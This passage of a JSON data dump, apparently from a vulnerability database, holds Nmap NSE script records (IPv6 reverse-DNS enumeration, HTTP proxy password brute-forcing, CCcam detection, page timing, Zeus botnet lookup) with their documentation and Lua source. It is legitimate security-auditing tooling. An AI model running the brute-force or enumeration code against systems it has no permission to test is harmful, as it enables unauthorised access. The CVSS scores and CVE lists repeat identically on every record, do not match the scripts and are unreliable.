SCRIPT_NAME\n status, accounts = engine:start()\n if( not(status) ) then\n return accounts\n end\n\n return accounts\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:54", "description": "Performs a quick reverse DNS lookup of an IPv6 network using a technique which analyzes DNS server response codes to dramatically reduce the number of queries needed to enumerate large networks. \n\nThe technique essentially works by adding an octet to a given IPv6 prefix and resolving it. If the added octet is correct, the server will return NOERROR, if not a NXDOMAIN result is received. \n\nThe technique is described in detail on Peter's blog: <http://7bits.nl/blog/2012/03/26/finding-v6-hosts-by-efficiently-mapping-ip6-arpa>\n\n### See also:\n\n * [ dns-nsec3-enum.nse ](<../scripts/dns-nsec3-enum.html>)\n * [ dns-nsec-enum.nse ](<../scripts/dns-nsec-enum.html>)\n * [ dns-brute.nse ](<../scripts/dns-brute.html>)\n * [ dns-zone-transfer.nse ](<../scripts/dns-zone-transfer.html>)\n\n## Script Arguments \n\n#### prefix \n\nthe ip6 prefix to scan\n\n#### mask \n\nthe ip6 mask to start scanning from\n\n## Example Usage \n \n \n nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | dns-ip6-arpa-scan:\n | ip ptr\n | 2001:0DB8:0:0:0:0:0:2 resolver1.example.com\n |_2001:0DB8:0:0:0:0:0:3 resolver2.example.com\n \n\n## Requires \n\n * [coroutine](<>)\n * [dns](<../lib/dns.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-01T13:04:23", "type": "nmap", "title": "dns-ip6-arpa-scan NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-24T19:36:04", "id": "NMAP:DNS-IP6-ARPA-SCAN.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-ip6-arpa-scan.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal dns = require \"dns\"\nlocal ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms a quick reverse DNS lookup of an IPv6 network using a technique\nwhich analyzes DNS server response codes to dramatically reduce the number of queries needed to enumerate large networks.\n\nThe technique essentially works by adding an octet to a given IPv6 prefix\nand resolving it. If the added octet is correct, the server will return\nNOERROR, if not a NXDOMAIN result is received.\n\nThe technique is described in detail on Peter's blog:\nhttp://7bits.nl/blog/2012/03/26/finding-v6-hosts-by-efficiently-mapping-ip6-arpa\n]]\n\n---\n-- @usage\n-- nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'\n--\n-- @see dns-nsec3-enum.nse\n-- @see dns-nsec-enum.nse\n-- @see dns-brute.nse\n-- @see dns-zone-transfer.nse\n--\n-- @output\n-- Pre-scan script results:\n-- | dns-ip6-arpa-scan:\n-- | ip ptr\n-- | 2001:0DB8:0:0:0:0:0:2 resolver1.example.com\n-- |_2001:0DB8:0:0:0:0:0:3 resolver2.example.com\n--\n-- @args prefix the ip6 prefix to scan\n-- @args mask the ip6 mask to start scanning from\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"discovery\"}\n\n\nlocal arg_prefix = stdnse.get_script_args(SCRIPT_NAME .. \".prefix\")\nlocal arg_mask = stdnse.get_script_args(SCRIPT_NAME .. \".mask\")\n\n-- Return a prefix and mask based on script arguments. First checks for \"/\"\n-- netmask syntax; then looks for a \"mask\" script argument if that fails. The\n-- \"/\" syntax wins over \"mask\" if both are present.\nlocal function get_prefix_mask(arg_prefix, arg_mask)\n if not arg_prefix then\n return\n end\n local prefix, mask = string.match(arg_prefix, \"^(.*)/(.*)$\")\n if not mask then\n prefix, mask = arg_prefix, arg_mask\n end\n return prefix, mask\nend\n\nprerule = function()\n local prefix, mask = get_prefix_mask(arg_prefix, arg_mask)\n return prefix and mask\nend\n\nlocal function query_prefix(query, result)\n local condvar = nmap.condvar(result)\n local status, res = dns.query(query, { dtype='PTR' })\n if ( not(status) and res == \"No Answers\") then\n table.insert(result, query)\n elseif ( status ) then\n local ip = query:sub(1, -10):gsub('%.',''):reverse():gsub('(....)', '%1:'):sub(1, -2)\n ip = ipOps.bin_to_ip(ipOps.ip_to_bin(ip))\n table.insert(result, { ptr = res, query = query, ip = ip } )\n end\n condvar \"signal\"\nend\n\naction = function()\n\n local prefix, mask = get_prefix_mask(arg_prefix, arg_mask)\n local query = dns.reverse(prefix)\n\n -- cut the query name down to the length of the prefix\n local len = (( mask / 8 ) * 4) + #(\".ip6.arpa\") - 1\n\n local found = { query:sub(-len) }\n local threads = {}\n\n local i = 20\n\n local result\n repeat\n result = {}\n for _, f in ipairs(found) do\n for q in (\"0123456789abcdef\"):gmatch(\"(%w)\") do\n local co = stdnse.new_thread(query_prefix, q .. \".\" .. f, result)\n threads[co] = true\n end\n end\n\n local condvar = nmap.condvar(result)\n repeat\n for t in pairs(threads) do\n if ( coroutine.status(t) == \"dead\" ) then threads[t] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until( next(threads) == nil )\n\n if ( 0 == #result ) then\n return\n end\n\n found = result\n i = i + 1\n until( 128 == i * 2 + mask )\n\n table.sort(result, function(a,b) return (a.ip < b.ip) end)\n local output = tab.new(2)\n tab.addrow(output, \"ip\", \"ptr\")\n\n for _, item in ipairs(result) do\n tab.addrow(output, item.ip, item.ptr)\n end\n\n return \"\\n\" .. tab.dump(output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:08", "description": "Performs brute force password guessing against HTTP proxy servers.\n\n## Script Arguments \n\n#### http-proxy-brute.url \n\nsets an alternative URL to use when brute forcing (default: <http://scanme.insecure.org>)\n\n#### http-proxy-brute.method \n\nchanges the HTTP method to use when performing brute force guessing (default: HEAD)\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-proxy-brute -p 8080 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 8080/tcp open http-proxy\n | http-proxy-brute:\n | Accounts\n | patrik:12345 - Valid credentials\n | Statistics\n |_ Performed 6 guesses in 2 seconds, average tps: 3\n \n\n## Requires \n\n * [base64](<../lib/base64.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:21:57", "type": "nmap", "title": "http-proxy-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-PROXY-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/http-proxy-brute.html", "sourceData": "local base64 = require \"base64\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password guessing against HTTP proxy servers.\n]]\n\n---\n-- @usage\n-- nmap --script http-proxy-brute -p 8080 <host>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 8080/tcp open http-proxy\n-- | http-proxy-brute:\n-- | Accounts\n-- | patrik:12345 - Valid credentials\n-- | Statistics\n-- |_ Performed 6 guesses in 2 seconds, average tps: 3\n--\n-- @args http-proxy-brute.url sets an alternative URL to use when brute forcing\n-- (default: http://scanme.insecure.org)\n-- @args http-proxy-brute.method changes the HTTP method to use when performing\n-- brute force guessing (default: HEAD)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n-- maybe the script does not need to be in the external category\n-- as most request should not \"leave\" the proxy.\ncategories = {\"brute\", \"intrusive\", \"external\"}\n\n\nportrule = shortport.port_or_service({8123,3128,8000,8080},{'polipo','squid-http','http-proxy'})\n\nlocal arg_url = stdnse.get_script_args(SCRIPT_NAME .. '.url') or 'http://scanme.nmap.org/'\nlocal arg_method = stdnse.get_script_args(SCRIPT_NAME .. '.method') or \"HEAD\"\n\nDriver = {\n\n new = function(self, host, port)\n local o = { host = host, port = port }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function( self )\n return true\n end,\n\n login = function( self, username, password )\n\n -- the http library does not yet support proxy authentication, so let's\n -- do what's necessary here.\n local header = { [\"Proxy-Authorization\"] = \"Basic \" .. base64.enc(username .. \":\" .. password) }\n local response = http.generic_request(self.host, self.port, arg_method, arg_url, { header = header, bypass_cache = true } )\n\n -- if we didn't get a 407 error, assume the credentials\n -- were correct. we should probably do some more checks here\n if ( response.status ~= 407 ) then\n return true, creds.Account:new( username, password, creds.State.VALID)\n end\n\n return false, brute.Error:new( \"Incorrect password\" )\n end,\n\n disconnect = function( self )\n return true\n end,\n}\n\n-- checks whether the proxy really needs authentication and that the\n-- authentication mechanism can be handled by our script, currently only\n-- BASIC authentication is supported.\nlocal function checkProxy(host, port, url)\n local response = http.generic_request(host, port, arg_method, url, { bypass_cache = true })\n\n if ( response.status ~= 407 ) then\n return false, \"Proxy server did not require authentication\"\n end\n\n local proxy_auth = response.header[\"proxy-authenticate\"]\n if ( not(proxy_auth) ) then\n return false, \"No proxy authentication header was found\"\n end\n\n local challenges = http.parse_www_authenticate(proxy_auth)\n\n for _, challenge in ipairs(challenges) do\n if ( \"Basic\" == challenge.scheme ) then\n return true\n end\n end\n return false, \"The authentication scheme wasn't supported\"\nend\n\naction = function(host, port)\n\n local status, err = checkProxy(host, port, arg_url)\n if ( not(status) ) then\n return stdnse.format_output(false, err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local result\n status, result = engine:start()\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:35", "description": "Detects the CCcam service (software for sharing subscription TV among multiple receivers). \n\nThe service normally runs on port 12000. It distinguishes itself by printing 16 random-looking bytes upon receiving a connection. \n\nBecause the script attempts to detect \"random-looking\" bytes, it has a small chance of failing to detect the service when the data do not seem random enough.\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [formulas](<../lib/formulas.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-27T01:13:35", "type": "nmap", "title": "cccam-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2014-02-13T16:39:17", "id": "NMAP:CCCAM-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/cccam-version.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal formulas = require \"formulas\"\n\ndescription = [[\nDetects the CCcam service (software for sharing subscription TV among\nmultiple receivers).\n\nThe service normally runs on port 12000. It distinguishes\nitself by printing 16 random-looking bytes upon receiving a\nconnection.\n\nBecause the script attempts to detect \"random-looking\" bytes, it has a small\nchance of failing to detect the service when the data do not seem random\nenough.]]\n\ncategories = {\"version\"}\n\nauthor = \"David Fifield\"\n\nlocal NUM_TRIALS = 2\n\nlocal function trial(host, port)\n local status, data, s\n\n s = nmap.new_socket()\n status, data = s:connect(host, port)\n if not status then\n return\n end\n\n status, data = s:receive_bytes(0)\n if not status then\n s:close()\n return\n end\n s:close()\n\n return data\nend\n\nportrule = shortport.version_port_or_service({10000, 10001, 12000, 12001, 16000, 16001}, \"cccam\")\n\nfunction action(host, port)\n local seen = {}\n\n -- Try a couple of times to see that the response isn't constant. (But\n -- more trials also increase the chance that we will reject a legitimate\n -- cccam service.)\n for i = 1, NUM_TRIALS do\n local data\n\n data = trial(host, port)\n if not data or seen[data] or #data ~= 16 or not formulas.looksRandom(data) then\n return\n end\n seen[data] = true\n end\n\n port.version.name = \"cccam\"\n port.version.version = \"CCcam DVR card sharing system\"\n nmap.set_port_version(host, port)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:23", "description": "Measures the time a website takes to deliver a web page and returns the maximum, minimum and average time it took to fetch a page. \n\nWeb pages that take longer time to load could be abused by attackers in DoS or DDoS attacks due to the fact that they are likely to consume more resources on the target server. This script could help identifying these web pages.\n\n## Script Arguments \n\n#### http-chrono.tries \n\nthe number of times to fetch a page based on which max, min and average calculations are performed.\n\n#### http-chrono.withindomain \n\nonly spider URLs within the same domain. This widens the scope from `withinhost` and can not be used in combination. (default: false)\n\n#### http-chrono.withinhost \n\nonly spider URLs within the same host. (default: true)\n\n#### http-chrono.maxdepth \n\nthe maximum amount of directories beneath the initial url to spider. A negative value disables the limit. (default: 3)\n\n#### http-chrono.maxpagecount \n\nthe maximum amount of pages to visit. A negative value disables the limit (default: 1)\n\n#### http-chrono.url \n\nthe url to start spidering. This is a URL relative to the scanned host eg. /default.html (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-chrono <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n |_http-chrono: Request times for /; avg: 2.98ms; min: 2.63ms; max: 3.62ms\n \n PORT STATE SERVICE\n 80/tcp open http\n | http-chrono:\n | page avg min max\n | /admin/ 1.91ms 1.65ms 2.05ms\n | /manager/status 2.14ms 2.03ms 2.24ms\n | /manager/html 2.26ms 2.09ms 2.53ms\n | /examples/servlets/ 2.43ms 1.97ms 3.62ms\n | /examples/jsp/snp/snoop.jsp 2.75ms 2.59ms 3.13ms\n | / 2.78ms 2.54ms 3.36ms\n | /docs/ 3.14ms 2.61ms 3.53ms\n | /RELEASE-NOTES.txt 3.70ms 2.97ms 5.58ms\n | /examples/jsp/ 4.93ms 3.39ms 8.30ms\n |_/docs/changelog.html 10.76ms 10.14ms 11.46ms\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [httpspider](<../lib/httpspider.html>)\n * [math](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [url](<../lib/url.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-23T19:29:44", "type": "nmap", "title": "http-chrono NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-CHRONO.NSE", "href": "https://nmap.org/nsedoc/scripts/http-chrono.html", "sourceData": "local http = require \"http\"\nlocal httpspider = require \"httpspider\"\nlocal math = require \"math\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal url = require \"url\"\n\ndescription = [[\nMeasures the time a website takes to deliver a web page and returns\nthe maximum, minimum and average time it took to fetch a page.\n\nWeb pages that take longer time to load could be abused by attackers in DoS or\nDDoS attacks due to the fact that they are likely to consume more resources on\nthe target server. This script could help identifying these web pages.\n]]\n\n---\n-- @usage\n-- nmap --script http-chrono <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- |_http-chrono: Request times for /; avg: 2.98ms; min: 2.63ms; max: 3.62ms\n--\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-chrono:\n-- | page avg min max\n-- | /admin/ 1.91ms 1.65ms 2.05ms\n-- | /manager/status 2.14ms 2.03ms 2.24ms\n-- | /manager/html 2.26ms 2.09ms 2.53ms\n-- | /examples/servlets/ 2.43ms 1.97ms 3.62ms\n-- | /examples/jsp/snp/snoop.jsp 2.75ms 2.59ms 3.13ms\n-- | / 2.78ms 2.54ms 3.36ms\n-- | /docs/ 3.14ms 2.61ms 3.53ms\n-- | /RELEASE-NOTES.txt 3.70ms 2.97ms 5.58ms\n-- | /examples/jsp/ 4.93ms 3.39ms 8.30ms\n-- |_/docs/changelog.html 10.76ms 10.14ms 11.46ms\n--\n-- @args http-chrono.maxdepth the maximum amount of directories beneath\n-- the initial url to spider. A negative value disables the limit.\n-- (default: 3)\n-- @args http-chrono.maxpagecount the maximum amount of pages to visit.\n-- A negative value disables the limit (default: 1)\n-- @args http-chrono.url the url to start spidering. This is a URL\n-- relative to the scanned host eg. /default.html (default: /)\n-- @args http-chrono.withinhost only spider URLs within the same host.\n-- (default: true)\n-- @args http-chrono.withindomain only spider URLs within the same\n-- domain. This widens the scope from <code>withinhost</code> and can\n-- not be used in combination. (default: false)\n-- @args http-chrono.tries the number of times to fetch a page based on which\n-- max, min and average calculations are performed.\n\n\nauthor = \"Ange Gutek\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local maxpages = stdnse.get_script_args(SCRIPT_NAME .. \".maxpagecount\") or 1\n local tries = stdnse.get_script_args(SCRIPT_NAME .. \".tries\") or 5\n\n local dump = {}\n local crawler = httpspider.Crawler:new( host, port, nil, { scriptname = SCRIPT_NAME, maxpagecount = tonumber(maxpages) } )\n crawler:set_timeout(10000)\n\n -- launch the crawler\n while(true) do\n local start = stdnse.clock_ms()\n local status, r = crawler:crawl()\n if ( not(status) ) then\n break\n end\n local chrono = stdnse.clock_ms() - start\n dump[chrono] = tostring(r.url)\n end\n\n -- retest each page x times to find an average speed\n -- a significant diff between instant and average may be an evidence of some weakness\n -- either on the webserver or its database\n local average,count,page_test\n local results = {}\n for result, page in pairs (dump) do\n local url_host, url_page = page:match(\"//(.-)/(.*)\")\n url_host = string.gsub(url_host,\":%d*\",\"\")\n\n local min, max, page_test\n local bulk_start = stdnse.clock_ms()\n for i = 1,tries do\n local start = stdnse.clock_ms()\n if ( url_page:match(\"%?\") ) then\n page_test = http.get(url_host,port,\"/\"..url_page..\"&test=\"..math.random(100), { no_cache = true })\n else\n page_test = http.get(url_host,port,\"/\"..url_page..\"?test=\"..math.random(100), { no_cache = true })\n end\n local count = stdnse.clock_ms() - start\n if ( not(max) or max < count ) then\n max = count\n end\n if ( not(min) or min > count ) then\n min = count\n end\n end\n\n local count = stdnse.clock_ms() - bulk_start\n table.insert(results, { min = min, max = max, avg = (count / tries), page = url.parse(page).path })\n end\n\n local output\n if ( #results > 1 ) then\n table.sort(results, function(a, b) return a.avg < b.avg end)\n output = tab.new(4)\n tab.addrow(output, \"page\", \"avg\", \"min\", \"max\")\n for _, entry in ipairs(results) do\n tab.addrow(output, entry.page, (\"%.2fms\"):format(entry.avg), (\"%.2fms\"):format(entry.min), (\"%.2fms\"):format(entry.max))\n end\n output = \"\\n\" .. tab.dump(output)\n else\n local entry = results[1]\n output = (\"Request times for %s; avg: %.2fms; min: %.2fms; max: %.2fms\"):format(entry.page, entry.avg, entry.min, entry.max)\n end\n return output\nend\n\n\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:43", "description": "Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch. Please review the following information before you start to scan: \n\n * <https://zeustracker.abuse.ch/ztdns.php>\n\n## Example Usage \n \n \n nmap -sn -PN --script=dns-zeustracker <ip>\n\n## Script Output \n \n \n Host script results:\n | dns-zeustracker:\n | Name IP SBL ASN Country Status Level Files Online Date added\n | foo.example.com 1.2.3.4 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-17\n |_ bar.example.com 1.2.3.5 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-15\n\n## Requires \n\n * [dns](<../lib/dns.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-31T18:11:54", "type": "nmap", "title": "dns-zeustracker NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DNS-ZEUSTRACKER.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-zeustracker.html", "sourceData": "local dns = require \"dns\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch.\nPlease review the following information before you start to scan:\n* https://zeustracker.abuse.ch/ztdns.php\n]]\n\n---\n-- @usage\n-- nmap -sn -PN --script=dns-zeustracker <ip>\n-- @output\n-- Host script results:\n-- | dns-zeustracker:\n-- | Name IP SBL ASN Country Status Level Files Online Date added\n-- | foo.example.com 1.2.3.4 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-17\n-- |_ bar.example.com 1.2.3.5 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-15\n\nauthor = \"Mikael Keri\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\", \"external\", \"malware\"}\n\n\n\nhostrule = function(host) return not(ipOps.isPrivate(host.ip)) end\n\naction = function(host)\n\n local levels = {\n \"Bulletproof hosted\",\n \"Hacked webserver\",\n \"Free hosting service\",\n \"Unknown\",\n \"Hosted on a FastFlux botnet\"\n }\n local dname = dns.reverse(host.ip)\n dname = dname:gsub (\"%.in%-addr%.arpa\",\".ipbl.zeustracker.abuse.ch\")\n local status, result = dns.query(dname, {dtype='TXT', retAll=true} )\n\n if ( not(status) and result == \"No Such Name\" ) then\n return\n elseif ( not(status) ) then\n return stdnse.format_output(false, \"DNS Query failed\")\n end\n\n local output = tab.new(9)\n tab.addrow(output, \"Name\", \"IP\", \"SBL\", \"ASN\", \"Country\", \"Status\", \"Level\",\n \"Files Online\", \"Date added\")\n for _, record in ipairs(result) do\n local name, ip, sbl, asn, country, status, level, files_online,\n dateadded = table.unpack(stringaux.strsplit(\"| \", record))\n level = levels[tonumber(level)] or \"Unknown\"\n tab.addrow(output, name, ip, sbl, asn, country, status, level, files_online, dateadded)\n end\n return stdnse.format_output(true, tab.dump(output))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:56", "description": "Performs brute force password auditing against the VMWare Authentication Daemon (vmware-authd).\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 